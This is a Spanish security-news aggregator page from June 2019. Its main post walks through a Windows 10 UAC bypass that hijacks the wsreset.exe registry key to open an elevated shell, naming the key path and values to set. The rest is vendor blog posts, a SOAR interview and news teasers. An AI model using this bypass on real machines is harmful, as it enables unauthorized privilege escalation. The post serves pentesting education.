Security Posts

Infocon: green

ISC Stormcast For Wednesday, June 19th 2019 https://isc.sans.edu/podcastdetail.html?id=6546
Categorías: Security Posts

Hacking Windows: Bypass UAC en Windows 10 a través de Windows Store

Un informático en el lado del mal - Hace 1 hora 6 mins
El año 2017 y 2018 fue, probablemente, el año de los bypasses de UAC. En este blog hablamos de muchos de ellos: mocking trusted directory, fileless 3, con DLL Hijacking, etcétera. Hay un largo repositorio de técnicas de bypass de UAC en este blog. Es más, desde el equipo de Ideas Locas del área CDO lanzamos una herramienta para la investigación, detección, explotación y mitigación de bypasses de UAC llamada UAC-A-Mola. La herramienta fue presentada en la BlackHat Europe de 2017.

Figura 1: Hacking Windows: Bypass UAC en Windows 10 a través de Windows Store
Llevaba un tiempo con los bypasses de UAC apartados, aunque seguía las noticias de cerca y veía que han seguido apareciendo diferentes técnicas. El objetivo es encontrar nuevos caminos para hacer Hacking de Windows 10. Hoy voy a hablar de un bypass de UAC que fue publicado en marzo de 2019 y ha sido “parcheado” por Microsoft en mayo de 2019. Lo interesante de este bypass es que si has ido siguiendo los artículos y has visto el paper que el equipo de Ideas Locas publicó puedes ver que el siguiente bypass que trataremos es muy sencillo de entender y de lograr.

Figura 2: Libro de "Hacking Windows: Ataques a sistemas y redes Microsoft" de 0xWord
Es más, una de las cosas que UAC-A-Mola pretendió en sus comienzos era ayudar a los investigadores a descubrir, de forma automatizada, a encontrar binarios potenciales y descubrir nuevos bypasses de UAC. No hay que olvidar este artículo en el que hablamos bien a fondo de este hecho.

Figura 3:UAC Bypass & Research with UAC-A-Mola de ElevenPaths
¿En qué consiste este nuevo bypass de UAC? Es un bypass de tipo fileless, ya que no hay que subir nada a disco para lograr la ejecución en un contexto de integridad alto. Lo interesante es que es en Windows 10 y, como se verá, no es nada difícil de entender o manipular, sin olvidarnos que se ha parcheado.

Jugando con el bypass de UAC también en 2019

Lo primero es tener el binario potencial. En este caso se trata de un binario de Windows 10 denominado wsreset.exe. Este binario corresponde con el Windows Store. Tiraremos de sigcheck para ver la firma del binario y si la directiva "autoElevate" se encuentra a "True". En este caso observamos que se cumplen estas dos situaciones por lo que el binario es potencialmente bypasseable.

Figura 4: autoElevate vale True
Ahora toca analizar qué es lo que no se encuentra en el sistema de archivos o en las ramas del registro cuando el binario wsreset.exe es ejecutado. Con la herramienta procmon.exe se puede monitorizar las acciones que realiza un proceso en diferentes entornos: sistema de archivos, en la red, en el registro… Vamos, una de nuestras preferidas en los scripts de Pentesting con Powershell que te debes conocer al detalle.

Figura 5: Libro de "Pentesting con PowerShell" 2ª Edición de 0xWord
Aplicando varios filtros en la herramienta, entre ellos el que solo se monitorice el registro, que el nombre del proceso sea wsreset.exe y el valor de la operación sea ‘NAME NOT FOUND’ podemos encontrar una cosa interesante. Se busca en HKCR un hive que no se encuentra y que apunta a un binario.

Figura 6: Valores NAME NOT FOUND en WSReset.exe
En la documentación de Microsoft podemos encontrar algo interesante y es que desde Windows 2000 HKCR es una compilación y mezcla entre HKCU\Software\Classes y HKLM\Software\Classes. Además, si un valor existe en ambas subclaves, la que tiene precedencia es HKCU\Software\Classes. ¿Interesante? Si nos fijamos en el resultado que obtenemos con procmon es que la ruta del registro
HKCR\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\commandPara ver si realmente existe tenemos que mirar en:
 HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command En caso de existir podremos cambiar el valor ‘(Default)’ y apuntarlo hacia donde nosotros queramos. En el caso de que no exista, se puede crear la estructura.

Cuando creamos la ruta hay que fijarse que DelegateExecute esté apuntando a “”. En el caso de la clave ‘(Default)’ se debe indicar qué binario que se quiera arrancar. Para este ejemplo se usa un simple cmd.exe, pero se puede utilizar otras cosas para levantar sesiones de Meterpreter o de nuestro iBombshell, entre otras cosas, por ejemplo.

Figura 7: Modificación de valor (Default)
Una vez está creada la ruta en el registro y configurada con el binario se puede invocar la aplicación wsreset.exe. Lógicamente, y como siempre hemos dicho, esto tiene sentido dentro de la fase de post-explotación de un Ethical Hacking. En el momento en el que tenemos una máquina comprometida y se dan las circunstancias para que un bypass de UAC, a través de una Shell remota, nos proporcione una nueva sesión con privilegios. Fácil de utilizar en Metasploit.

Figura 8: Metasploit para Pentesters 4ª Edición y Hacking con Metasploit: Advanced Pentesting
Ahora vamos a abrir un cmd.exe y miramos el nivel de integridad - recordad nuestra querida MicEnum de ElevenPaths - del proceso a través del comando whoami /groups. En esta imagen se puede ver que el nivel de integridad donde se ejecuta el cmd.exe es nivel medio.

Figura 9: Nivel de Integridad del proceso
Desde esta cmd.exe lanzamos el comando wsreset.exe y vemos que se abre una nueva ventana que corresponde con el binario Windows Store. En una ejecución normal, tras lanzar el binario wsreset.exe se abriría un entorno gráfico de la Windows Store.

Figura 10: Ejecución de WSreset.exe
Como se puede ver en la imagen siguiente, se obtiene una pantalla, la cual al cerrarse abrirá una cmd.exe. Esto es importante, porque este proceso se estará ejecutando en un nivel de integridad alto.

Figura 11: Nivel de integridad alto
Esta nueva cmd.exe que se abre se está ejecutando en un nivel de integridad alto, es decir, se podrá impersonar a SYSTEM y tener el control total del sistema. En ningún momento el UAC ha saltado evitando o alertando de la elevación de privilegio. Para obtener este tipo de información se debe ejecutar el comando whoami /groups.

Figura 12: PoC Bypass UAC en Windows 10 a través de Windows Store
Sin duda es un bypass de UAC sencillo, pero que es útil. Es más, según han informado se ha parcheado recientemente, finales de mayo. Sea como sea, seguramente lo veamos pronto en nuestro iBombShell y en otras herramientas de explotación y post-explotación. Os dejamos un video para ejemplificar el bypass.

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.
Sigue Un informático en el lado del mal - Google+ RSS 0xWord
Categorías: Security Posts

ISC Stormcast For Wednesday, June 19th 2019 https://isc.sans.edu/podcastdetail.html?id=6546, (Wed, Jun 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Vision X Best of Show Special Prize at Interop Tokyo 2019

BreakingPoint Labs Blog - Hace 3 horas 36 mins
Ixia's Vision X - 2019 Tokyo Interop Best of Show Special Prize Winner  There are a number of…
Categorías: Security Posts

How The New TLS1.3 Standard Will Affect Your Encryption Tactics

BreakingPoint Labs Blog - Hace 3 horas 36 mins
The IETF released a new version of their encryption standard called RFC 8446 (Transport Layer…
Categorías: Security Posts

Why SPAN when you can Tap?

BreakingPoint Labs Blog - Hace 3 horas 36 mins
In networking, as is the case with life, there are usually multiple ways of trying to get to the…
Categorías: Security Posts

Introducing Ixia’s Newest Packet Broker: Vision X

BreakingPoint Labs Blog - Hace 3 horas 36 mins
As the FIFA Women’s World Cup matches start up, you can bet I will be live-streaming games — at…
Categorías: Security Posts

Investigating Windows Graphics Vulnerabilities: A Reverse Engineering and Fuzzing Story

BreakingPoint Labs Blog - Hace 3 horas 36 mins
Introduction It is not surprising that vulnerabilities targeting Windows applications and…
Categorías: Security Posts

Join us at Cisco Live ‘19

BreakingPoint Labs Blog - Hace 3 horas 36 mins
The one constant in networking is change, and that usually means a little added complexity, at…
Categorías: Security Posts

Game of Vulnerabilities: Bluekeep

BreakingPoint Labs Blog - Hace 3 horas 36 mins
If you have been following what’s happening in the field of computer security, or perhaps even if…
Categorías: Security Posts

Dynamic Analysis of a Windows Malicious Self-Propagating Binary

BreakingPoint Labs Blog - Hace 3 horas 36 mins
Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most…
Categorías: Security Posts

GDPR is here to stay

BreakingPoint Labs Blog - Hace 3 horas 36 mins
What is GDPR? General Data Protection Regulation, or GDPR, is a European regulatory package for…
Categorías: Security Posts

How To Optimize Your Security Defenses

BreakingPoint Labs Blog - Hace 3 horas 36 mins
As I mentioned in a blog a couple months ago, there is an absolute myriad of security architectures…
Categorías: Security Posts

Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

Zero in a bit - Mar, 2019/06/18 - 21:24
“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area. 20 percent of users will never change behavior, no matter how well you train Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them. Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice). Education is good, but it must be coupled with technical controls This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training will reduce vulnerabilities being introduced into the code, which reduces the cost of your DevSecOps program because security defects that never enter the code are understandably much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production. At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect. Learn more about Veracode’s Developer Training.
Categorías: Security Posts

How Not To Prevent a Cyberwar With Russia

Wired: Security - Mar, 2019/06/18 - 17:30
Former cybersecurity officials warn against a path of aggression that could inflame cyberwar rather than deter it.
Categorías: Security Posts

The Honeynet Project Workshop 2019 in Innsbruck, Austria

honeyblog - Mar, 2019/06/18 - 16:49

 
The Honeynet Project Workshop 2019
Hotel Grauer Bär
Universitätsstraße 5-7
6020 Innsbruck, Austria
July 1st–3rd, 2019
 
https://austria2019.honeynet.org/
 
Categorías: Security Posts

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Zero in a bit - Mar, 2019/06/18 - 16:39
Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week. 57 Percent of Midsize Enterprises Don’t Have a CISO Gartner defines midsize enterprises as companies with less than $20 million in IT security budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. This means the CIO is accountable for cybersecurity in most midsize enterprises. According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of the IT headcount is dedicated to security, so you have to have at least 17 people in IT before you start dedicating a full headcount to security. Below that water mark, it’s only partial headcounts. That’s a lot of security areas to cover for very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, the midsize enterprise is hit even harder by the InfoSec skill gap because they often cannot compete with Fortune 500 salaries and benefits. How Can Midsize Enterprises Address These Challenges? Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:
  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  
Framing Security Spending With Executive Leadership Before Paul joined Gartner, he spent decades working in the trenches in midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you” This is a great mind shift that I can absolutely see working with executives. I also liked how he boiled down the basics of what a security program must do:
  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on
I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business! Be Pragmatic and Don’t Do Everything In-House With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.” A Recipe for a Successful Security Program in Midsize Enterprise Paul summed up his recommendations as follows:
  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.
Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations. How to Do DevSecOps in Midsize Enterprises Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges. Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader for six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: You don’t have to set up any infrastructure so your developers can start scanning on day one. Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning. Security as a Competitive Advantage As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.   “You may not have the need today, but it’s well worth doing the research today.”
Categorías: Security Posts

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Zero in a bit - Mar, 2019/06/18 - 15:47
Most legacy applications were not developed with security in mind. However, modern businesses and organizations are continuing to undergo digital transformation in order to pursue new business models and revenue channels, as well as giving their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that allow for the scalability necessary to provide applications and services to a broad customer base. For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service. But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought. With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications. Veracode pioneered static binary analysis to address the security of modern applications, which are often comprised from different teams, languages, frameworks and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits. Yet the Veracode Platform offers so much more than its signature static binary analysis. “With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.” To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.
Categorías: Security Posts

SOAR with AT&T Cybersecurity and Dark Reading

AlienVault Blogs - Mar, 2019/06/18 - 15:00
Watch the full video on our site. If you prefer reading, here’s the full transcript 😊 Terry Sweeney - Contributing Editor, Dark Reading Sanjay Ramnath - Associate Vice President, Product Marketing, AT&T Cybersecurity Terry Sweeney: Welcome back to the Dark Reading News Desk. We’re here at the RSA Conference in San Francisco. I’m Terry Sweeney, contributing editor at Dark Reading and I’m delighted today to be joined by Sanjay Ramnath, vice president of product marketing at AT&T Cybersecurity. Sanjay, thanks so much for joining us today. Sanjay Ramnath: Thanks so much for having me. Terry Sweeney: This trend of SOAR, security orchestration automation and response is generating lots of buzz both here at RSA and among InfoSec professionals as well. Kick us off by explaining what SOAR is and how the companies that use it benefit from it. Sanjay Ramnath: SOAR is a term that was coined by Gartner. SOAR is really a collection of technologies and processes that aim to solve three problems. I think the first problem that the SOAR framework aims to solve is: How do you stay ahead of this constantly evolving threat landscape? How do you stay ahead of a rapidly changing network while the modern attack surface continues to expand and network parameters vanish? You have hybrid environments with on-premises and cloud assets. So one of the core tenants of SOAR is aggregating data, aggregating both threat data and intelligence and network visibility on a single platform so all the downstream operational decisions around security can be fed with this stream of intelligence and data. The second problem that SOAR addresses is complexity in the security ecosystem and infrastructure itself. When you have a really large number of point solutions and products that protect specific threat vectors you have two issues. One is you have a management problem: how do you constantly switch contexts across these different solutions? You also have a problem of too much data and what is called alert fatigue. The SOAR approach attempts to solve this by automating some of the more mundane resource intensive, human intensive, tasks like data analysis and correlation so the security operations teams can be a lot more effective and they don’t get distracted by the noise. They actually focus on what’s important. The third thing that SOAR addresses is incident response. What do you do when an incident happens? What do you do when your network is intruded upon? Do you have the right processes? Do you have the right workflows in place? Do you have the right data for investigations? SOAR brings all of these together. So SOAR is not a single technology or a single product, it’s really a concept or a framework that brings detection, automation, response, orchestration, intelligence and all of that all together under a common set of terminologies.   Terry Sweeney: That’s really helpful and I’m glad you mention automation. It seems like given the volumes of information that have to be analyzed; this is an essential piece of SOAR. Talk a bit more about why it’s critical to have in combating today’s security issues. Sanjay Ramnath: You’re never going to have enough resources, bandwidth, and skills in security to stay ahead of the cyber criminals and threat landscape. So I think applying automation where it makes sense really helps streamline security operation. As I mentioned earlier, applying automation in terms of taking this really vast amount of data, threat data and converting that into actionable, tactical threat intelligence is the place where techniques and learning can really help. Automation is not the be-all and end-all to everything but it can definitely make the human components more efficient. So if you have human researchers feeding them a curated set of data that is run through some automated algorithms makes their jobs a lot easier. Similar to the operations side, once you have visibility into your network, once you have the threat intelligence, the process of correlating that, the process of actually making that data and converting it into alerts, of making that data so that your human element, the security practitioners, can quickly take action against the data, automation can help there as well. So rather than trying to wade through the data itself they can focus on the outcome, and they can focus on the response and actions. Then finally yet importantly, in terms of responding to the breaches, responding to incidents, that’s another place automation can help, so the low-hanging fruit, if you will. If you can automate the response actions around that, your human capital, your human resources are free to go address the much bigger problems, where they really have to apply their expertise. Terry Sweeney: That makes total sense, thanks. So, security information event management, or SIEM and SOAR – these two acronyms often get used interchangeably, which isn’t completely accurate. Talk about about how SIEM and SOAR are different. Sanjay Ramnath: SIEM is about collecting data and providing a set of tools to manipulate and act on the data. SOAR is about taking SIEM but then also adding the right processes, the right incident response mechanisms, so you can do more with the data. SOAR is a superset in a sense. What you consider SIEM and log management, data management is part of the value chain that SOAR attempts to address. Terry Sweeney: Talk a bit about how AT&T Cybersecurity has applied SOAR principles to the products and services that it offers. Sanjay Ramnath: Sure. So AT&T Cybersecurity’s value proposition is three-fold. The first pillar to our value proposition is this concept of threat intelligence, phenomenal threat intelligence as we call it. And they way we drive that is through Alien Labs. We gather threat data from a number of different sources. We have one of the world’s largest crowd-sourced threat intelligence, threat data portals, it’s called Open Threat Exchange. We have the massive visibility and scale of the AT&T network infrastructure itself, and we have a team of researchers, and automation and machine learning, where we can take this really large canvas of diverse data across a number of vectors and convert that into very actionable, tactical threat intelligence. Then we feed that threat intelligence into our platforms, into our security operations teams. So that’s the first tenant. And as I mentioned, a big part of SOAR is automating the process of gathering threat data and converting that threat data into threat intelligence. So it’s a core part of what we provide. The second pillar to our value proposition is this concept of collaborative defense. One of the founding principles for AT&T Cybersecurity is that no single security vendor or no single organization can fight cyber crime on their own. It’s a collective effort. So we’ve invested in bringing together, in integrating best-of-breed solutions, but then adding the right layer of services, consulting, managed services over that so they can work better together. So the concept of integration, in terms of getting crowd sourced threat data and also in terms of bringing an ecosystem of security solutions together and making them work as a unified whole is an important part of this. In fact that’s another element of SOAR: the concept of orchestration and automation and making sure that your operations can be more streamlined. The last pillar that we provide is this concept of security without the seams. Which is the realization that most breaches today don’t happen because any little piece of technology failed. It’s not because you don’t have a firewall or because you don’t have an email gateway. What your attackers are able to do effectively is exploit the seams in security infrastructure, the gaps, the complexity. You have a lot of products, you have a lot of management interfaces, you have a lot of surfaces, on-premises and cloud and SaaS and so on. So seamlessly, or virtually seamlessly integrating and orchestrating people, process, and technology, doing that in a software-defined way with a platform that can abstract, integrate, orchestrate across those different components is part of the value proposition. So if you look at the AT&T portfolio today, we have Cybersecurity Consulting to help our customers understand their risk profiles, understand their vulnerabilities, plan their security posture. We have Managed Security Services so we can manage everything from firewalls to web gateways, to email gateways, application security, endpoints, and mobile and so on. And we have a software defined platform for threat detection and incident response, which acts as the foundation for everything else we do. And then all of this is fed through the threat intelligence that we generate through the Alien Labs framework. So our brand promise implements a lot of the concepts that SOAR is advocating. Terry Sweeney: Security staffing is, as we know, an ongoing headache for end user organizations. The talent crunch for information security is tight and not going to change anytime soon. SOAR purports to ease some of these staffing challenges. Automation is one piece of it. Talk a little bit about where SOAR can help free up staff to do other things as well. Sanjay Ramnath: One of the key benefits of SOAR is in streamlining operations and really helping organizations do more with less and I think there are a couple of different aspects to this. Automation really helps to streamline and curate data so as a security practitioner, as a sec ops team, you only see what is really important. So, for example, one of the things that we provide on our unified security management, USM, platform is, we take the data from the network, we take the threat intelligence and then correlate that and start qualifying alerts and ranking them so when a practitioner looks at the dashboard, all they’re seeing are things that are really important. They have a sense of how severe the alert is, they have a sense of the meta data they need to investigate those incidents further, so their job becomes a lot easier. It’s more intelligence and data driven rather than throwing raw data at them and letting them do the work. And then the other area where I think SOAR really helps with the security operations problem is around response automation, around orchestrating breach responses. The other aspect of that is response automation. Can you quickly create a firewall rule to block a certain IP or quarantine a certain endpoint.  Can you quickly create a rule to block a certain url or web proxy and can you do all of this from one place, from one pane of glass so you don’t have to deal with multiple user interfaces. So that’s an aspect to helping streamline the operations part of it. The third aspect is around streamlining the communication, providing reports, providing dashboards, providing as much aggregation as possible in the dashboard so you can have one pane of glass where you can get a view of your entire environment, your security posture, your assets and so on. So again, you can do more with that small team of people. Terry Sweeney: Bringing intelligence both to the work priorities and also the workflows themselves. Context, the indicators, the potential virulence of a piece of malware for example. Talk a bit about how threat intel gets integrated into SOAR. Sanjay Ramnath: Threat intelligence feeds detection platforms, threat intelligence feeds data analysis platforms, threat intelligence can feed security operations teams. Teams that look at the alerts and have to take actions, and have to decide whether a certain incident is more severe than the other. So intelligence can feed that as well. So I think threat intelligence is a foundational element to everything that goes above in the stack, from the platform, to the automation, to the orchestration, to the services and the whole sec ops stack. Terry Sweeney: Which really makes SOAR appropriate for companies of all sizes? Sanjay Ramnath: I think so. The concept of SOAR I think is appropriate for companies of all sizes. How you choose to implement it depends on the size of the company, the vertical, which stage in the security lifecycle you are. But as a blue print, if you will, the basic tenants that SOAR advocates and the problems that SOAR is trying to solve, I think apply to organizations of pretty much any size. Terry Sweeney: Great. Those are some great insights there Sanjay, thank you so much.
Categorías: Security Posts

A Plan to Stop Breaches With Dead Simple Database Encryption

Wired: Security - Mar, 2019/06/18 - 15:00
Database giant MongoDB has a new encryption scheme that should help slow the scourge of breaches.
Categorías: Security Posts
Distribuir contenido